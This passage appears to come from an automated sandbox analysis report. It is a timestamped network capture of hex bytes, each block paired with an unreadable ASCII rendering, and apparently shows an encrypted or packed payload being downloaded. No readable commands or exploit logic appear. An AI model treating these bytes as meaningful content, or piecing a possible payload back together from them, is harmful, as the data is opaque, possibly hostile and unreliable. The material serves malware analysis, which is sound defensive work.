                                                                                                                                                                                    2023-01-05 07:58:37 UTC14016INData Raw: 16 41 67 bd a1 49 f6 c1 3b 00 75 00 b6 da c7 41 69 d0 e1 d2 22 88 4e 48 e9 ed 77 00 77 00 79 81 a7 2f 1c e1 01 8b 26 25 32 f7 a6 63 10 1b 43 41 40 d0 82 81 f3 d1 10 3b 78 f8 93 da 8b c1 f8 02 8b bf e0 01 68 4c 70 df 9e c6 34 04 75 f8 36 0f ad 41 84 c5 48 41 e6 e4 31 81 81 a5 24 b5 0b e9 99 fc 7d 00 3e 81 8e 01 72 00 32 41 6d 9f b0 66 29 f7 b6 c7 12 45 3e b6 77 44 45 c3 02 0f c8 e0 fa 41 e2 f0 ac 41 67 bf b4 d2 af 41 e1 c8 3d 0f c0 c7 25 80 b2 ef c7 48 6d bd b7 66 6b c7 32 f6 a7 d3 f9 98 7a b3 97 41 56 d8 3e 0f 81 f0 20 8b 74 04 9d 49 f2 eb 73 00 31 00 8d 41 fe 03 2d 81 98 04 32 00 62 c0 bc ed a8 ec 28 4d 4c c5 70 8b 77 33 b4 f8 a5 c0 71 ff fa f5 6d c8 30 80 94 af 3b 3b 88 05 66 2b ea 4f 8e f8 b5 c8 8a 53 f3 d3 f8 31 74 24 28 0a ad 66 b6 db fa 5b 3d 63 b7
                                                                                                                                                                                    Data Ascii: AgI;uAi"NHwwy/&%2cCA@;xhLp4u6AHA1$}>r2Amf)E>wDEAAgA=%Hmfk2zAV> tIs1A-2b(MLpw3qm0;;f+OS1t$(f[=c
                                                                                                                                                                                    2023-01-05 07:58:37 UTC14032INData Raw: b9 09 57 a4 2a 98 52 f9 15 c1 af 61 79 81 9a 04 77 00 64 9f f2 cc 99 8b 65 80 8d 3d 29 33 b3 f9 32 84 e3 05 cd 06 65 68 28 85 94 66 0f 31 05 f5 87 d8 29 f7 b4 6f 34 2b 63 41 f1 f9 42 8b 45 1d 67 e9 8e 80 60 00 39 8b 69 0f b3 cd fc c8 f1 e1 9b 65 3f 8b 6c 86 b2 49 bb 09 2a 81 9f 04 68 00 73 66 78 c8 b1 f4 4c c1 9f 38 ef 07 9b a7 65 fe 9d 45 f4 c1 2d 33 b2 45 f3 fb c8 41 f4 c0 ff 30 05 60 33 c1 f2 02 8b e8 43 09 68 ff bb c1 bf 02 b1 ff e8 f5 36 53 55 04 56 66 76 0f 2a de 87 c3 fd 57 b7 2e 36 5b 0d 39 9c 34 d1 f6 9b 66 37 89 30 48 e3 ef 74 00 68 00 36 0a b7 44 ba 07 30 33 b6 41 a5 c8 70 41 b2 f8 d7 f9 3c 85 84 41 7c c8 11 81 ce 0c 24 f5 36 81 a4 8a 50 e5 63 f5 8b 28 be 00 68 49 f2 c2 75 00 31 00 3c 63 b3 41 4e d3 14 98 7a 81 8d 01 70 00 68 41 85 c6 dc e9 72
                                                                                                                                                                                    Data Ascii: W*Raywde=)32eh(f1)o4+cABEg`9ie?lI*hsfxL8eE-3EA0`3Ch6SUVfv*W.6[94f70Hth6D03ApA<A|$6Pc(hIu1<cANzphAr
                                                                                                                                                                                    2023-01-05 07:58:37 UTC14048INData Raw: c0 b0 55 de 53 80 04 a9 f9 d1 4f 30 65 e1 4b 47 d9 74 6d d9 4d 44 2c ae e6 15 20 37 26 25 37 40 f5 38 82 d0 60 08 9a a7 98 59 91 3e 48 69 87 49 ee fc b5 d7 68 cc f0 a0 d8 9d fa 39 51 ad bf 4e a6 a0 f1 c3 21 90 f3 b4 cd c1 ea 2d 19 f1 e7 5a b9 64 9c c4 6d 54 99 b3 91 05 81 2a 02 35 d0 5d 83 28 2d cd 1f 18 29 ba ba 49 62 23 2e 79 23 54 9c ec 42 ca 5c dc 55 bd a4 8d 56 24 31 bd 4e 53 4e 90 2a e5 9e a0 3c 92 21 f1 63 0b a7 c1 26 7c 0e 54 41 e2 87 64 04 95 3f 35 4b 0c b8 05 49 7b 7f 18 e6 eb ab 28 eb 9c 12 79 fd 05 c6 49 f8 72 23 dc 8d ec b0 ec dc 9b 1a bd 97 02 86 8d 93 75 6c 80 d9 f8 f8 b0 98 8f 53 e1 94 16 93 d1 83 61 72 44 ed ff e7 74 f5 88 1f 25 fe 11 cf 15 e8 66 5b 08 01 f6 dd 38 44 81 6d 69 4e 18 e4 59 0b 6f 45 cc 29 f1 c2 fc 2b 86 2e ad 32 1f fa 9d 3f
                                                                                                                                                                                    Data Ascii: USO0eKGtmMD, 7&%7@8`Y>HiIh9QN!-ZdmT*5](-)Ib#.y#TB\UV$1NSN*<!c&|TAd?5KI{(yIr#ulSarDt%f[8DmiNYoE)+.2?
                                                                                                                                                                                    2023-01-05 07:58:37 UTC14064INData Raw: 8d ff c9 81 82 4f 3f 95 59 c1 bd 03 db 9e 2d 05 70 45 42 da 36 8b 6d 66 70 85 a6 f8 3e 81 a6 04 72 00 32 45 58 e0 34 33 b3 e9 e7 66 8c ff d8 86 72 f8 88 ff aa e9 94 33 35 00 8b d0 60 fb 97 41 85 c6 35 f8 79 03 8f e9 09 ae 9a ff 37 3a cf 49 e3 c2 74 00 68 00 8b 33 b4 f7 e1 f5 83 c7 63 41 e4 fb ff 2d 76 23 80 22 31 80 97 a0 46 be 6d 3a 0b 0f bd f9 9e 4f 49 06 72 33 f1 f5 6d c8 88 d1 a8 e9 1d 39 7f 00 57 41 fe 01 11 41 77 d6 3b 81 f3 02 62 00 70 c0 92 50 37 3a 90 66 f0 e2 05 48 f6 ef 65 00 72 00 f2 da 8b 80 ae a8 67 b6 5c 66 f0 d2 70 32 9d 40 a7 c5 02 44 7d ac f0 29 22 02 a4 40 e8 c5 a4 66 78 ba c3 2c 35 02 a2 40 92 d5 14 c1 e0 59 23 0f c7 d2 28 80 9e 83 3f 99 57 0f c3 d2 78 ba 86 33 32 f6 e7 40 48 d6 f0 d6 51 40 f3 f5 69 40 b1 ed ac 40 81 dd 20 32 b7 66 3d
                                                                                                                                                                                    Data Ascii: O?Y-pEB6mfp>r2EX43fr35`A5y7:Ith3cA-v#"1Fm:OIr3m9WAAw;bpP7:fHerg\fp2@D})"@fx,5@Y#(?Wx32@HQ@i@@ 2f=
                                                                                                                                                                                    2023-01-05 07:58:37 UTC14080INData Raw: 8d ff 9f dd f2 f5 5f 6e 93 08 f4 c5 92 13 4b 79 f2 fd 9d 66 23 f7 b1 c5 05 f7 a6 e9 50 c6 c7 ff 8d f9 a6 c0 9d 66 33 f7 f5 6d 62 57 7f ba 9f 3d 42 04 53 80 c8 6e 2a e9 61 6c 92 ff 9b 1e 6c 02 62 66 35 3b 83 41 22 41 78 9b f0 31 61 24 36 f6 b5 41 2b 48 51 d2 27 3b 8e f5 20 03 81 e9 1a b4 37 00 fc 0c 73 45 ef 1a 33 f6 f3 a4 04 44 4b ff 91 49 f2 c2 73 00 31 00 8c e9 d7 51 65 00 3b 8b 09 66 22 0f c6 d5 e8 e9 76 48 78 bf e3 49 fe 53 7f c0 bd 0d 33 8a 79 10 23 f6 b7 70 90 48 f6 e2 3e 81 f2 02 75 00 77 f9 9c 48 7d ad e5 e9 85 12 87 ff 25 8b 72 4c 44 d9 57 41 b4 cb db 41 a4 d3 1e 4d b9 59 6a 66 87 c6 0b 7c 3a 81 b6 0c 31 00 75 f9 5c d2 8d d5 76 03 32 f7 bb f5 b1 c1 6a e9 8e b8 8f ff c9 d1 b5 e9 f4 73 65 00 14 41 b3 fd 29 0d 39 81 81 0c 73 00 77 66 0a c2 8c 41 fe
                                                                                                                                                                                    Data Ascii: _nKyf#Pf3mbW=BSn*allbf5;A"Ax1a$6A+HQ'; 7sE3DKIs1Qe;f"vHxIS3y#pH>uwH}%rLDWAAMYjf|:1u\v2jseA)9swfA
                                                                                                                                                                                    2023-01-05 07:58:37 UTC14096INData Raw: f1 4c 61 c0 99 8e cb 01 73 81 8c 04 31 00 75 0f f2 c5 89 fd 8d 4c b9 c8 8b c2 9d fd 97 81 82 1d 10 1d 22 e9 8d f1 76 00 2c f7 b0 af 4d 33 06 41 43 c0 9d 40 f7 dd f7 fc a2 05 9c 0d 37 21 02 41 f3 f9 c0 69 2b 3b 92 f7 b0 35 57 66 73 52 c4 f7 a5 c1 bf 02 8d 42 bb f7 cd e9 90 2d 70 00 0e 41 fa 58 7f 9c 70 8f 75 48 b6 f3 89 41 f9 1a 73 f6 a7 db 39 81 aa 04 73 00 77 41 02 db 8d 81 b4 12 60 7b 14 f5 e3 cb 8b 8b 4a 06 68 41 fa 5a 7f c6 f6 06 e9 c1 84 52 6b 98 b1 0f 88 e3 5e 41 ff 02 0e 81 80 25 6c 0f 8e d9 67 fb 3f 81 89 04 72 00 32 80 b9 2f fb 5c 4d 00 40 df f6 f3 8c 10 7e 22 8f c1 af 02 9b 6f 5d 07 62 e9 4f 48 6d 00 f2 fb 74 00 31 00 7a 85 db b5 9d ff 3e 8b f2 e9 f5 1d 8a ff 81 12 f4 f7 88 57 f2 f7 a4 e9 19 22 9e ff 33 52 7f 0f c9 ca 39 c1 92 73 3a c1 9d db 00
                                                                                                                                                                                    Data Ascii: Las1uL"v,M3AC@7!Ai+;5WfsRB-pAXpuHAs9swA`{JhAZRk^A%lg?r2/\M@~"o]bOHmt1z>W"3R9s:
                                                                                                                                                                                    2023-01-05 07:58:37 UTC14112INData Raw: fc 06 a4 eb f7 66 88 15 72 66 e9 8b 36 04 8b 8a 39 08 79 81 9b 02 77 00 64 c6 b4 4e 73 0f c7 d8 34 89 2e 08 32 8a a5 9c e3 ca 3d 23 a6 41 6e d0 fd 06 7b 81 89 04 70 00 68 41 f8 13 9e e3 a4 fb 8a 81 8c 02 64 00 72 0f b7 0a 20 05 70 48 e3 d0 9a 3c 01 fd ce d1 b4 81 9e 86 5d 93 5e f5 65 f9 53 0c 54 5f 20 63 ba f8 3b 03 f0 e9 ca f9 8f ff 02 45 f9 09 73 0a 9a 49 f1 ea 6c 00 73 00 8e 41 3e b7 88 41 fc 3a 20 3b a4 f5 01 fd 97 e9 66 85 96 ff ef 66 33 1b e3 49 a6 e2 36 8f 65 41 84 d2 77 0f d5 d0 31 80 b2 c4 3b 81 98 04 31 00 75 44 fc 17 9d 66 f7 df 77 33 b2 41 87 da 29 81 b1 84 48 5e 01 41 82 da 9e b7 29 f5 8d f7 e0 e9 9c c3 85 ff 29 d1 b9 85 91 e9 c1 c8 80 ff 3e 8b 7e 66 33 0f 99 e0 44 66 34 8b 73 49 f2 c2 71 00 31 00 8c 45 f0 c0 29 0f de f8 78 66 27 89 6a 66 29
                                                                                                                                                                                    Data Ascii: frf69ywdNs4.2=#An{phAdr pH<]^eST_ c;EsIlsA>A: ;ff3I6eAw1;1uDfw3A)H^A))>~f3Df4sIq1E)xf'jf)
                                                                                                                                                                                    2023-01-05 07:58:37 UTC14128INData Raw: 11 41 c6 c3 49 50 36 51 2d c1 8b 5e 73 f7 b3 41 f0 d9 21 31 7f 24 36 f6 e0 45 7a b7 bc 66 25 81 bb 69 78 41 3b 48 13 c9 90 e9 26 8c 82 ff e0 cd 9c 65 75 f5 9b 3b 9b 4d b7 c0 8b da 15 fc 97 41 49 fb 20 40 c7 d7 44 04 53 66 25 2b 8b 49 51 f9 22 80 97 dc 37 f7 b1 e3 5e 25 14 48 16 c0 f7 fd a2 4c 71 c0 73 50 a1 ff be f7 b6 f8 8a f5 b6 c6 32 66 31 85 a2 41 5e d4 25 66 73 0f df fe 38 81 af 81 11 d8 0f 31 05 24 2a f9 3f 63 92 f9 87 4c 31 c6 23 ff 90 41 67 cb 9a c6 31 fe ce ff bf 81 85 36 18 57 15 f5 cb d1 a0 66 31 3b 8f f8 15 41 80 c3 78 10 f4 ea 1c 09 91 25 8a f5 f3 c2 61 0f ba f7 b2 f9 32 50 33 85 ef 41 f5 d0 ba 41 9b c0 43 14 16 4d 6d 4f b2 41 30 f5 33 f6 b2 f4 79 63 a7 f5 36 f6 a3 fd 3e 03 e8 41 31 c3 b1 c3 6a 81 98 00 47 38 76 a8 cc 41 24 31 78 24 33 5b 73
                                                                                                                                                                                    Data Ascii: AIP6Q-^sA!1$6Ezf%ixA;H&eu;MAI @DSf%+IQ"7^%HLqsP2f1A^%fs81$*?cL1#Ag16Wf1;Ax%a2P3AACMmOA03yc6>A1jG8vA$1x$3[s
                                                                                                                                                                                    2023-01-05 07:58:37 UTC14144INData Raw: a1 49 29 8b 79 f9 82 33 fc e9 a8 70 74 00 29 8b a8 49 b3 ea 6a 00 70 00 67 ac 96 2c 3a 89 2b 48 f4 ef 73 00 64 00 33 f6 f2 fc 23 80 8a 79 e3 2f 8a e9 8b a4 30 00 8a c3 8e e9 34 fe 8a ff 32 00 7e 69 d7 3c 29 f7 a2 e9 68 eb c7 ff 9c 96 66 fb 9b f8 7d ce cb c1 ac 03 88 57 0e 81 b4 1e 76 31 05 24 34 0f c8 fc 58 6b 33 1a cf 5f 9a 40 f4 f4 20 63 85 4c 74 c6 d8 23 6f 01 77 4d ef 09 14 f7 e3 48 e3 ed 74 00 68 00 15 b9 0d 71 3e 9c b4 8b 3b 25 64 40 48 dd c7 41 51 c8 89 81 81 1c 09 b6 60 f7 e0 f8 9c e4 6f 06 64 33 bd ff f3 41 e2 f9 88 0f a1 f8 86 81 86 34 13 9d 2c f5 f6 c1 bb 57 97 1c ca 57 04 0f ca f7 be 4c 7c a4 b0 fb 79 c1 aa 3b 46 0c 40 40 a0 c7 72 d2 8d 5f 88 e9 74 e1 84 ff 36 ff fa 41 f5 fe cc 41 e5 f3 3b 0f b3 20 23 c1 b3 03 9d 41 84 d3 82 41 e0 c3 80 41 78
                                                                                                                                                                                    Data Ascii: I)y3pt)Ijpg,:+Hsd3#y/042~i<)hf}Wv1$4Xk3_@ cLt#owMHthq>;%d@HAQ`od3A4,WWL|y;F@@r_t6AA; #AAAx
                                                                                                                                                                                    2023-01-05 07:58:37 UTC14160INData Raw: f0 02 97 f8 87 d2 9d f9 b2 c2 75 f5 70 80 8b e6 8f f7 be f7 a0 f8 db f2 b7 fb 8f f9 29 33 b8 45 4d fa c6 d9 9c 9b 7d f9 9b 48 f9 fe 7a 81 8c 02 70 00 68 66 fa 3e 36 32 fc 8a ba 41 fc 0a 2d 81 8f 17 76 e5 58 49 f1 c2 6c 00 73 00 37 80 cf a6 80 33 bc f7 bd 81 b3 4f 6b 09 57 e9 f8 b4 9f ff 37 84 a3 81 c3 10 31 dc 54 e9 dd 68 85 ff db 11 1b f5 8f 4d 0b db 36 85 90 f5 78 03 86 e9 d4 ed 67 00 3b 8b 33 66 26 0f db ca 0e 41 7c 47 a6 66 3e b6 65 45 55 d0 02 41 7d ba d0 0b 04 45 7f be bb 49 f2 c1 71 00 31 00 30 0f c8 d2 02 41 fb 11 7f 0f d5 d2 38 81 87 04 73 00 77 4d 3e ab bf 66 36 0f de fa 6f 44 b9 17 8b 1e c7 f9 97 66 36 8b 7e 48 b0 ed 71 00 77 00 02 44 7d a3 db 0f de ce 89 8b 24 25 73 41 44 c8 c8 81 b4 6e 7e ac 73 f9 87 c1 fb 03 97 81 81 cc 23 4d 3d f8 8e d1 f0
                                                                                                                                                                                    Data Ascii: up)3EM}Hzphf>62A-vXIls73OkW71ThM6xg;3f&A|Gf>eEUA}EIq10A8swM>f6oDf6~HqwD}$%sADn~s#M=
                                                                                                                                                                                    2023-01-05 07:58:37 UTC14176INData Raw: 77 00 25 0f cf c8 54 0f d8 f1 38 8b 24 25 73 66 36 f7 f0 4d 28 41 44 c8 93 d1 a3 c1 ca 81 93 f3 53 03 10 e9 40 8b 74 00 ce c0 34 3a a2 41 36 41 48 c6 03 04 46 45 7a d3 29 5a 86 f8 3f 63 f1 48 76 f8 9e 29 60 f6 8d f7 eb 41 32 31 7c 24 90 66 37 0f c1 c7 70 f7 ad 41 2f f8 2c 63 bb 44 08 e4 9b 4c 73 d9 81 bc 00 fd 88 66 c6 d2 13 44 78 ab a2 40 f2 e6 21 66 95 d0 39 3b a8 40 f3 de cc 41 c7 c0 07 66 7c d0 02 f7 a4 0f 85 f2 04 41 f9 51 60 66 84 d6 eb 41 be 01 3d 81 9a 04 64 00 72 40 b2 de 18 4c 7f a3 9e f5 f8 74 52 00 70 33 85 45 4d f5 24 f6 b5 93 b3 c6 79 6a 53 77 e9 fb 8f 5d 01 2e 57 44 4e f7 80 d6 9c 81 9c a9 35 7d 3f e9 f8 b1 9d ff 8a 41 26 4d 32 ce 34 c0 b6 06 25 d2 93 31 2e 24 04 44 53 c9 29 d2 b2 41 2e 48 52 db 8d f9 3f 03 97 e9 fe 94 cd ff 2a 03 af e9 94
                                                                                                                                                                                    Data Ascii: w%T8$%sf6M(ADS@t4:A6AHFEz)Z?cHv)`A21|$f7pA/,cDLsfDx@!f9;@Af|AQ`fA=dr@LtRp3EM$yjSw].WDN5}?A&M24%1.$DS)A.HR?*
                                                                                                                                                                                    2023-01-05 07:58:37 UTC14192INData Raw: 2e 08 71 b5 89 9c 36 8f 65 66 32 0f 84 ef b1 f5 39 0f df ec 3b 81 98 04 31 00 75 f6 b6 cd 20 0f de fd 85 40 e6 fd fb 2f 81 cd 12 01 77 44 ba 0e ff 4e 73 48 e5 ee 74 00 32 00 a2 cb c4 66 bb c3 32 d3 96 41 bb da 7a 9e b4 44 ed 4e 7a 48 3d bf bb 9c 16 0f d2 f3 f6 8f 71 49 b0 eb 71 00 77 00 02 c1 99 48 c5 d3 2b 0f c7 df 29 8b 68 41 44 da c9 c1 be 02 f7 fa 1e f7 a9 f5 e3 c3 23 84 83 45 52 ca 84 d3 36 52 70 80 bf f4 3a 0f 24 d4 43 1c 16 41 a2 d2 94 41 a9 ea 8b 41 2d 48 52 db 13 45 4c c6 2c 03 89 e9 f1 3c 65 00 31 8b 61 45 f8 59 73 48 ba e9 13 81 9a be 3e 66 7d a4 f7 57 2b 81 99 04 68 00 73 40 a5 dd c6 d1 34 f7 a4 66 e5 c5 e6 01 3d bb 97 41 7b cb 28 0f e0 c5 11 0f fc 41 fc 49 7f 40 d1 49 ee 0f 85 ee 23 8f 71 40 dd b7 15 0f ba 48 b0 ef 71 00 77 00 02 44 49 cc 72
                                                                                                                                                                                    Data Ascii: .q6ef29;1u @/wDNsHt2f2AzDNzH=qIqwH+)hAD#ER6Rp:$CAAA-HREL,<e1aEYsH>f}W+hs@4f=A{(AI@I#q@HqwDIr
                                                                                                                                                                                    2023-01-05 07:58:38 UTC14208INData Raw: 34 3a ae f5 8b 48 14 c0 d8 20 55 fe 88 4c 67 df 9b 7b 5c fe 9d 49 fb 31 96 c1 ea 49 fc 51 39 f6 ac 80 86 5b 25 8a 3b 10 54 85 86 f9 39 81 a9 02 73 00 77 66 0a db 30 84 8b 48 6b ad a4 48 51 c8 2a f7 a1 49 e1 71 7b 66 78 be f9 66 cc cb 51 66 25 0f c4 ca ae 41 ed 01 16 44 67 ab 92 66 5c cc 79 3b 98 48 f6 ed 60 00 72 00 cb f7 bb 66 7f c9 e3 4c 56 00 9e 77 97 f6 8a 49 fc 0b 25 0f c8 f0 97 66 23 f7 a0 66 2d 0f b2 c0 3e 81 f2 08 75 00 77 66 21 1b b6 49 b3 ea 63 00 70 00 2d 0f c5 02 33 32 f2 f8 34 d0 bf 41 9a c0 8a 41 c4 d0 22 f6 b4 1a 91 41 f3 e8 db e9 be a2 83 ff 88 c0 24 80 8f 0f 07 40 4a 16 28 49 e9 f8 1b 31 72 57 d8 d6 96 05 77 e9 1b 7c 85 ff e3 c7 9a 41 20 45 67 b7 b4 41 78 b3 e1 4d 4e ee 46 3c 40 41 a0 e0 77 2b a2 41 28 40 e8 fc c3 48 14 ff 71 80 88 ac 3b
                                                                                                                                                                                    Data Ascii: 4:H ULg{\I1IQ9[%;T9swf0HkHQ*Iq{fxfQf%ADgf\y;H`rfLVwI%f#f->uwf!Icp-324AA"A$@J(I1rWw|A EgAxMNF<@Aw+A(@Hq;
                                                                                                                                                                                    2023-01-05 07:58:38 UTC14224INData Raw: f3 c8 60 e9 cc 44 6e 00 20 c3 8e 41 02 c0 8d 66 36 f7 a1 f8 05 80 cd ce 6d c8 75 e8 3f 5b 1c f5 78 c8 c9 45 f1 cb 5a 0b 5f 59 7d f9 77 84 b3 41 20 41 a8 c8 28 4d 78 ab d1 4d 7a bc b2 31 60 24 33 d3 da 66 23 81 8d 8c 59 f5 32 58 3f 63 f1 80 8b 01 8f 48 67 f0 9b b5 f9 06 62 66 31 0f de 28 32 8a 3f 02 57 0f cf f2 2f 0f db d1 3b 81 da 06 62 00 70 f6 b2 40 71 e9 11 8b e4 41 7a b7 a4 ba de 23 fb 1e 54 41 eb 68 78 66 67 ca ef 41 f7 f8 fe 48 b4 da b8 41 eb 00 14 41 21 d2 2b 3b 80 41 e3 12 86 45 f3 d3 70 3a 8b 49 f6 c2 60 00 72 00 73 f6 a3 9b 31 33 bb f7 a1 f8 82 e9 87 7b 81 ff 11 44 6b b6 74 f5 73 80 8b e7 34 8a 26 02 15 44 4c cc 70 80 8a 86 3f 81 8a 06 72 00 32 66 e3 fb 34 3e 81 b8 0d f6 88 41 c6 da 9c 4e c5 f3 9b 41 f9 1b 73 33 b8 c1 bb 02 91 f7 a8 d1 b4 a8 e0
                                                                                                                                                                                    Data Ascii: `Dn Af6mu?[xEZ_Y}wA A(MxMz1`$3f#Y2X?cHgbf1(2?W/;bp@qAz#TAhxfgAHAA!+;AEp:I`rs13{Dkts4&DLp?r2f4>ANAs3
                                                                                                                                                                                    2023-01-05 07:58:38 UTC14240INData Raw: 82 4d 07 db 14 f7 f6 52 70 66 4b dc 21 03 80 e9 a9 2b 37 00 34 ff 97 4d ed 43 7a e9 71 5d 94 ff 31 ff 88 49 f8 10 36 02 da 40 f5 f5 13 48 6b ba 82 a4 73 8a 0a 08 39 81 a8 0a 73 00 77 40 0b d7 35 88 5d 86 80 66 7d 47 f6 41 48 c3 31 8b 6a 49 f2 c2 73 00 31 00 80 44 f3 df 25 33 b1 e9 41 21 97 ff 39 81 82 01 73 00 77 45 3e b6 6f 44 45 dd 02 0f bb 49 3d bf a8 41 8e cb 0e c1 92 7d 3f c1 f0 1c 34 f6 ac 41 6b 45 b8 41 e2 cb 2a 63 bd 48 67 ac ba 77 3f 2b ff 41 f5 f3 fb 80 8d 2b a0 f1 e0 d1 23 32 9b 48 67 bd bf 49 78 bc fe 49 f4 e9 75 00 64 00 14 81 f3 3b 65 d2 a1 41 ec ca 15 45 fe 19 78 81 9f 04 77 00 64 80 af 66 73 0f d5 cb 31 8b 62 f9 40 cd 9e f3 bd fd 8a 41 f6 c0 02 7b 15 6d 7a 81 8d 04 70 00 68 66 32 d3 bf 49 f6 c0 c7 27 74 17 20 8b 75 e9 50 bb 62 00 31 d1 a8
                                                                                                                                                                                    Data Ascii: MRpfK!+74MCzq]1I6@Hks9sw@5]f}GAH1jIs1D%3A!9swE>oDEI=A}?4AkEA*cHgw?+A+#2HgIxIud;eAExwdfs1b@A{mzphf2I't uPb1
                                                                                                                                                                                    2023-01-05 07:58:38 UTC14256INData Raw: b5 e9 c2 b2 77 00 36 ff a5 f6 b4 cd b3 fe fb 4b f3 70 29 52 32 0f e5 c2 75 31 79 24 36 81 96 ee 27 17 12 66 23 d3 aa f5 29 5a 9a c2 e5 f3 ce 49 fe 01 fc 08 02 d3 98 49 b3 c1 66 00 70 00 ba fa 15 d3 85 41 b8 09 31 0f d3 c2 e9 fe b4 49 b3 ea 66 00 70 00 29 8b 61 33 a2 f7 e3 40 f5 fe e3 0f ae f7 a8 f9 db 9f 73 05 70 ff a2 53 f3 f7 ff d2 c6 66 34 0f c1 d8 55 14 56 5b db 1b cd f4 8f e9 f3 9e 8c ff 37 f6 f6 8a 13 44 f2 fc 25 51 33 d3 e3 49 e3 e1 ac 34 c0 75 37 31 73 24 70 80 9c 04 32 02 ab 41 2b f5 9b 04 66 55 0a 4d 0b c0 86 f8 3e 03 c1 e9 ea df 8b ff 91 05 19 6e a7 3e 95 d0 99 84 f0 f3 8c f7 a5 c1 f3 03 80 40 81 c6 36 f9 f3 c2 5a 47 7f 2b 39 81 94 cb 03 b7 74 55 71 d2 80 48 78 bd 89 66 a1 fd 03 14 46 66 a3 f5 35 45 49 e8 8e 48 52 d2 3d 03 ad e9 0d 51 8b ff b3
                                                                                                                                                                                    Data Ascii: w6Kp)R2u1y$6'f#)ZIIfpA1Ifp)a3@spSf4UV[7D%Q3I4u71s$p2A+fUM>n>@6ZG+9tUqHxfFf5EIHR=Q
                                                                                                                                                                                    2023-01-05 07:58:38 UTC14272INData Raw: cb f2 59 0c 57 41 f7 e2 0e 66 34 0f cd f2 18 41 28 48 51 c9 2e 3b 87 48 6b f9 9a 91 f3 f4 ce 41 82 da 8e e9 4e 81 8f ff ae 8f 64 66 35 8b ae 4d 7c bf b7 45 ba 02 3c 81 b5 04 64 00 72 44 01 c3 97 41 7f c8 90 41 b2 c0 75 e9 05 23 75 00 88 cb 9d f5 85 db ca 45 e7 ed 34 3b bd 57 15 c1 80 a9 57 0f cf f7 06 66 9b c7 43 1c 16 40 6d 9a b7 8b 92 5f 8b 48 14 db 7d 03 b6 e9 5b 87 9c ff 3b 03 c1 e9 73 7d 86 ff 9f d2 9a ce 31 04 31 48 16 f8 89 c2 24 d2 a5 48 3d ac b5 d7 86 da e8 ea c1 66 80 d7 57 81 9a 50 2a 66 6b a3 9d 32 e8 48 6d bf 8d 41 4a fa 7c 4d 8a 48 b0 ee 77 00 77 00 02 41 41 f8 54 89 74 40 c7 2f 20 0f ce fd 36 8b 0b 44 4f e0 3e 81 a6 04 72 00 32 f8 97 33 8b 0f a7 48 f2 fc 89 4b 57 05 13 45 f2 c3 92 c3 89 81 dd 29 45 5f 13 f8 81 7e 35 fa 88 66 70 f7 b6 4c 4b
                                                                                                                                                                                    Data Ascii: YWAf4A(HQ.;HkANdf5M|E<drDAAu#uE4;WWfC@m_H}[;s}11H$H=fWP*fk2HmAJ|MHwwAATt@/ 6DO>r23HKWE)E_~5fpLK
                                                                                                                                                                                    2023-01-05 07:58:38 UTC14288INData Raw: f0 f8 23 d1 b0 41 9e c2 96 f5 36 f7 e9 f5 34 81 9f 4b 19 6c 60 f9 73 c1 aa 03 31 52 2c 31 77 24 36 5a 7c 63 b5 f9 3e 03 9c e9 82 37 c8 ff 04 41 fb 02 29 8a 39 02 36 80 cd 0a 8c 66 36 3b ae 49 f3 ea 34 00 62 00 16 d3 88 66 7c c9 11 41 b8 42 7d 48 80 d1 f8 66 8d c9 73 8f 60 48 7f b7 a4 48 f2 ed 73 00 31 00 a7 ed fc 4c 41 00 3a f7 f4 8a 07 6d 14 e9 21 1d 70 00 3e 8b 32 b9 1e 68 19 65 24 8a 88 0f 88 f1 45 65 38 8b 50 49 fa 3b 3e 81 db 04 75 00 77 66 57 cd f4 ed e0 c5 23 8b 7a 66 2c 3b b1 48 80 c2 25 29 d6 4a 44 cb 9b c1 f3 f1 fe 70 f0 0b 89 40 e8 fd 83 f7 ae e9 f9 53 74 00 88 c9 8d 7f e1 fe cd 49 e9 39 99 4c 58 02 73 e9 74 3d c7 ff 13 44 78 ab b5 48 f3 ef 36 00 62 00 16 0b a6 66 32 0f ca cc 57 0f cf e1 b3 8b 6b 44 f6 f2 73 f6 a0 a5 31 33 a1 41 f3 f9 9b f7 e0
                                                                                                                                                                                    Data Ascii: #A64Kl`s1R,1w$6Z|c>7A)96f6;I4bf|AB}Hfs`HHs1LA:m!p>2he$Ee8PI;>uwfW#zf,;H%)JDp@StI9LXst=DxH6bf2WkDs13A
                                                                                                                                                                                    2023-01-05 07:58:38 UTC14304INData Raw: b2 49 a5 d0 51 31 36 24 23 0f c3 f0 0e 41 b2 e0 8b 41 69 48 16 c0 3f 03 94 e9 26 00 c0 ff 2a 63 b9 f6 ac 44 3b 03 86 e9 72 66 83 ff 11 f7 a6 cc 78 4c 31 c1 8b 26 af fe 97 f8 8a 48 14 f6 c9 66 34 81 8c b1 27 44 f6 c0 7a 03 bc e9 ab 99 9e ff 84 d9 82 41 b4 d0 f4 c1 5a 55 9a 4b 87 f8 c5 d9 e3 fd db 08 b7 12 37 3a 8c 41 63 41 7a ba 8d 66 55 0c 56 41 f2 da 7d 41 2a 66 29 f7 b6 a1 0e 48 52 c9 34 f6 b2 0f 2c 03 8b e9 57 5b 9d ff 38 03 aa f5 9a 11 48 f6 ce 66 34 8b 6e 66 25 8b 23 02 7a f7 bd 49 f1 e9 6e 00 73 00 37 c0 ee 3e 35 80 b0 ac 02 03 a8 40 b8 f9 04 41 f9 59 60 41 7c 4b 88 9c 70 8f 74 40 a5 ff 2d 0f c5 fd 54 81 9f 3a 11 48 e9 ed 77 00 77 00 57 0f cf e7 57 66 b7 ff 7d ab cd 8b 1e 25 70 41 5b f8 32 84 89 f8 b0 ef 67 19 54 51 6b cf 14 41 c5 c3 dd 51 35 85 8a
                                                                                                                                                                                    Data Ascii: IQ16$#AAiH?&*cD;rfxL1&Hf4'DzAZUK7:AcAzfUVA}A*f)HR4,W[8Hf4nf%#zIns7>5@AY`A|Kpt@-T:HwwWWf}%pA[2gTQkAQ5
